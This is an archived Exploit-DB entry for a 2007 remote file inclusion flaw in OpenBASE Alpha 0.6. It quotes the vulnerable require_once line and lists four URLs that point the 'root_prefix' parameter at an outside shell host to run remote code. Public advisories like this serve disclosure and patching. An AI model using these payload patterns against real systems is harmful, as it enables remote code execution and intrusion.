OpenBASE 0.6a - 'root_prefix' Remote File Inclusion

EDB-ID:

3991

CVE:

2007-2947

EDB Verified:

Author:

DeltahackingTEAM

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2007-05-25

Vulnerable App:

**********************************************************************************************************
                                              DeltaSecurityTEAM
                                              WwW.DeltaSecurity.iR
**********************************************************************************************************
* Portal Name = OpenBASE Alpha 0.6
* Class = Remote File Inclusion
* Risk = High (Remote File Execution)
* Download = Http://openbase.sourceforge.net
* Discoverd By = DeltahackingTEAM
* User In Delta Team = Dav00d_Cracker
* Conatact = Davood_cracker@Yahoo.com
--------------------------------------------------------------------------------------------
Vulnerability C0de :
Require_once($root_prefix . "nav.php");
--------------------------------------------------------------------------------------------
- Expl0it:
Http://localhost/[PATH]/index.php?root_prefix=http://Shellz?
Http://localhost/[PATH]/email_subscribe.php?root_prefix=http://Shellz?
Http://localhost/[PATH]/download.php?root_prefix=http://Shellz?
Http://localhost/[PATH]/development.php?root_prefix=http://Shellz?
--------------------------------------------------------------------------------------------
Gr33tz : Dr.Trojan , Hiv++ , D_7j , L0rd , RezaYavari , Vpc , all IRANIAN Hackers , and all Enemy
**********************************************************************************************************

# milw0rm.com [2007-05-25]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services